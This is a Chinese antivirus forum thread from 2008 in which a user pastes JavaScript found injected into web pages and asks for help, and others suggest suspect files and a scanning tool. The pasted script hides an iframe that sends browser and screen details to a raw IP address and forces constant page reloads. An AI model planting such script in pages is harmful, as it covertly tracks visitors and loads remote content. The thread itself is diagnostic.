风幻蓝 - 2008-9-13 11:51:00
很多网站的网页都不停的刷新,后来下了个跟踪包的程序,发现网页前面加了段这样的程序:
<html>
<head>
<meta http-equiv="refresh" c/>
</head>
<body>
</body>
<script language="javascript">
refresh=function(){
location.reload(true);
}
test=function(){
var objElement=document.createElement("iframe");
var link="http://59.34.108.203:6602/logo.jpg?p=";
link += Math.floor((new Date()).getTime()/1000);
link += "|";
link += navigator.appMinorVersion;
link += "|";
link += screen.availHeight;
link += "|";
link += screen.availWidth;
link += "|";
link += screen.colorDepth;
link += "|";
link += screen.height;
link += "|";
link += screen.width;
objElement.setAttribute("src",link);
objElement.style.display="none";
document.body.appendChild(objElement);
};
window.setInterval("window.status=' '",200);
window.setTimeout('refresh()',2000);
test();
</script>
</html>
这个是否是流氓软件加上去的呢?
用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-CN; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
帅哥阿福 - 2008-9-13 11:53:00
风幻蓝 - 2008-9-13 11:55:00
好像附近有几个朋友都是这样。另外跟浏览器无关,我换了火狐和傲游都是这样。
托莱多 - 2008-9-13 12:45:00
C:\WINNT\INF\UNREGMP2.EXE
C:\WINDOWS\SYSTEM32\DHZPCOLOR.VBS
有异常,提交到这里来吧。
小九的寒 - 2008-9-13 12:54:00
建议用sreng扫描一份系统日志以附件的形上上传上来.
SREng下载地址:
http://www.kztechs.com/sreng/download.html操作方法:
1、下载后解压缩,运行“SREngLdr.EXE”;
2、如果无法打开请尝试运行“安全启动.bat”;
3、打开后依次点击【智能扫描】-【扫描】,耐心等待,扫描结束后点击【保存报告】;
4、选择保存路径,文件名保持默认,直接点击【保存】;
5、将日志文件SREngLOG.log作为附件上传到论坛,同时务必详细描述问题现象,如果有查杀不净的病毒务必提供病毒名和路径。
注意:扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序。
风幻蓝 - 2008-9-13 17:06:00
谢谢各位的热心帮助!
那个dhzpcolor.vbs的文件印象中好像是惠普一体化打印机的驱动,不过不知道有没有被感染。另一个文件就不知道了。
另外附上用sreng扫描的日志,还要麻烦各位看看。
附件:
SREngLOG.rar
帅哥阿福 - 2008-9-13 22:24:00
C:\WINNT\system32\Drivers\klif.sys
有点可疑,没查出来是什么。
aaccbbdd - 2008-9-13 22:27:00
卡巴斯基的驱动
个人认为正常
风幻蓝 - 2008-9-15 12:15:00
下了个卡卡上网助手扫了一遍,没发现什么。
自己查了system32下一些文件,不知道下面这两个有没有可以(我的系统是win2000 advanced server版pack4)
user32.dll 创建时间:2008年9月13日, 10:29:37 文件大小:372 KB (381,200 字节)
basersrv.dll 创建时间:2008年9月13日, 10:36:45 文件大小:45.2 KB (46,352 字节)
这两个文件都是最近创建的,不知道有没有问题?
aaccbbdd - 2008-9-15 12:20:00
© 2000 - 2026 Rising Corp. Ltd.